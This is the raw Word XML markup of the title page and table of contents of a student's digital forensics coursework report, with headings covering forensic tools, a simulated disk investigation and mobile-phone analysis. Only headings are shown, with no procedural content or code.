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ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="2524760" cy="836295"/>
            <wp:effectExtent b="0" l="0" r="0" t="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524760" cy="83629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spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_24aapd9mmy1s" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pg8ae5hrxaax" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Digital Forensics Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qhvgzi9xbj3e" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ACCA7031</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:ind w:left="360"/>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2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8g135swmy883" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MSC Computer Networks and Cyber Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mbq728vf83dr" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">University of Wales Trinity Saint David</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3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_oefgq5rb158j" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Submitted By:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lfpnly9hgpn2" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pranjal Sinha</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8ftfitvf73" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2220277</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pStyle w:val="Heading4"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_13x6rejni5t4" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: January 12, 2024</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1"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m4eb1i5kz7v6" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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E">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bw5sd4ktdjxp">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Task 1</w:t>
              <w:tab/>
              <w:t xml:space="preserve">4</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ajofe0uwfv3f">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1.1. Current State of the Field</w:t>
              <w:tab/>
              <w:t xml:space="preserve">4</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u1n5ngnsznj8">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1.2. Intersection of Digital Forensics and Cybersecurity</w:t>
              <w:tab/>
              <w:t xml:space="preserve">5</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vgn2nyi61nl5">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1.3. Emerging Trends in Digital Forensics</w:t>
              <w:tab/>
              <w:t xml:space="preserve">5</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3n3xrxjtjxne">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1.3.1. Cloud Forensics</w:t>
              <w:tab/>
              <w:t xml:space="preserve">5</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mrgwfmsh96d8">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1.3.2. Social Media Forensics</w:t>
              <w:tab/>
              <w:t xml:space="preserve">6</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jqyh9jrw2grc">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1.3.3. IoT Forensics</w:t>
              <w:tab/>
              <w:t xml:space="preserve">7</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i42wnyyf7gn3">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1.3.4. Artificial intelligence</w:t>
              <w:tab/>
              <w:t xml:space="preserve">7</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44pfilvb7oyx">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1.4. Key Challenges Facing Digital Forensics</w:t>
              <w:tab/>
              <w:t xml:space="preserve">8</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35imlvw5ivfw">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1.5. National and International Job Market</w:t>
              <w:tab/>
              <w:t xml:space="preserve">10</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hyperlink w:anchor="_21ss5ehfk1ri">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Task 2</w:t>
              <w:tab/>
              <w:t xml:space="preserve">10</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k6tnl9xkx2d9">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2.1. Current State of Digital Forensic Tools</w:t>
              <w:tab/>
              <w:t xml:space="preserve">10</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bcr5ay1wrrp">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2.2. Features and Capabilities</w:t>
              <w:tab/>
              <w:t xml:space="preserve">11</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3o7ctsm1t2jo">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2.3. Evaluation of Open-source Tools Versus Commercial Tools</w:t>
              <w:tab/>
              <w:t xml:space="preserve">11</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hhbtl8v1uj9r">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2.4. Recommendation and Conclusion</w:t>
              <w:tab/>
              <w:t xml:space="preserve">11</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hyperlink w:anchor="_ycutn8z7e6lb">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2.5. Tools</w:t>
              <w:tab/>
              <w:t xml:space="preserve">11</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before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:rPr>
              <w:i w:val="0"/>
              <w:smallCaps w:val="0"/>
              <w:strike w:val="0"/>
              <w:color w:val="000000"/>
              <w:u w:val="none"/>
              <w:shd w:fill="auto" w:val="clear"/>
              <w:vertAlign w:val="baseline"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_kgfqjlpk4zqv">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Task 3: Digital Forensic Investigation Simulation</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">Part 1: Selecting a Theme and Collecting Data and Data Collection Report</w:t>
              <w:tab/>
              <w:t xml:space="preserve">14</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hyperlink w:anchor="_er54hnx70kda">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Task 3: Digital Forensic Investigation Simulation</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">Part 2: Analysing Data</w:t>
              <w:tab/>
              <w:t xml:space="preserve">16</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before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360"/>
            <w:rPr>
              <w:i w:val="0"/>
              <w:smallCaps w:val="0"/>
              <w:strike w:val="0"/>
              <w:shd w:fill="auto" w:val="clear"/>
              <w:vertAlign w:val="baseline"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_8pwh7amnlj4b">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4.1. Initial Examination and Assessment</w:t>
              <w:tab/>
              <w:t xml:space="preserve">16</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t9r1yidnaqs2">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4.2. Storage and Backup</w:t>
              <w:tab/>
              <w:t xml:space="preserve">17</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3a8vri2zou2q">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4.3. Directory Insight Analysis</w:t>
              <w:tab/>
              <w:t xml:space="preserve">17</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h7j4fmt2eln7">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4.3.1. VolumeConfiguration.plist and .fseventsd and fseventsd-uuid</w:t>
              <w:tab/>
              <w:t xml:space="preserve">17</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3gyq7oo4kkln">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4.3.2. Working with Document.rar and Readme.txt files</w:t>
              <w:tab/>
              <w:t xml:space="preserve">17</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a4mv0rmbfuqz">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4.3.3. Working with .File files and encrypt_file002.cpp file</w:t>
              <w:tab/>
              <w:t xml:space="preserve">18</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yzi7szuc3i2t">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4.3.4. Decrypted Files’ Analysis</w:t>
              <w:tab/>
              <w:t xml:space="preserve">19</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bhfxeia5us2z">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4.3.5. Steganography</w:t>
              <w:tab/>
              <w:t xml:space="preserve">19</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tpw8t7cypj6s">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4.3.6. Chats, Call Logs, and Police Report Analysis</w:t>
              <w:tab/>
              <w:t xml:space="preserve">20</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kbxvf8dnqku2">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4.4. Video Presentation and Conclusion</w:t>
              <w:tab/>
              <w:t xml:space="preserve">20</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hyperlink w:anchor="_xb42ke27nvbf">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Task 4: Mobile Digital Forensic Investigation Simulation</w:t>
              <w:tab/>
              <w:t xml:space="preserve">21</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qgtdxwnawnof">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.1. Initial Examination and Assessment</w:t>
              <w:tab/>
              <w:t xml:space="preserve">21</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kgmyib8y5u5b">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.1.1. Initial Examination of the Phone Case</w:t>
              <w:tab/>
              <w:t xml:space="preserve">21</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">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gjn980sqpxo3">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.1.2. Extraction Summary using Cellebrite UFED</w:t>
              <w:tab/>
              <w:t xml:space="preserve">21</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">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k9k1ltlbgjfg">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.2. Storage and Backup</w:t>
              <w:tab/>
              <w:t xml:space="preserve">22</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o4wxb7oh4ltx">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.3. Password Cracking</w:t>
              <w:tab/>
              <w:t xml:space="preserve">22</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3b2z8av6n3sn">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.3.1. Contacting the Manufacturer</w:t>
              <w:tab/>
              <w:t xml:space="preserve">23</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7xbhrsv8sfgd">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.3.2. ADB Connection</w:t>
              <w:tab/>
              <w:t xml:space="preserve">23</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bmbl212qi4jr">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.3.3. Jailbreaking the Device</w:t>
              <w:tab/>
              <w:t xml:space="preserve">23</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nyffvq9p0wha">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.3.4. Brute-Force Attack: Dictionary Attacks</w:t>
              <w:tab/>
              <w:t xml:space="preserve">23</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v5wx25q0whev">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
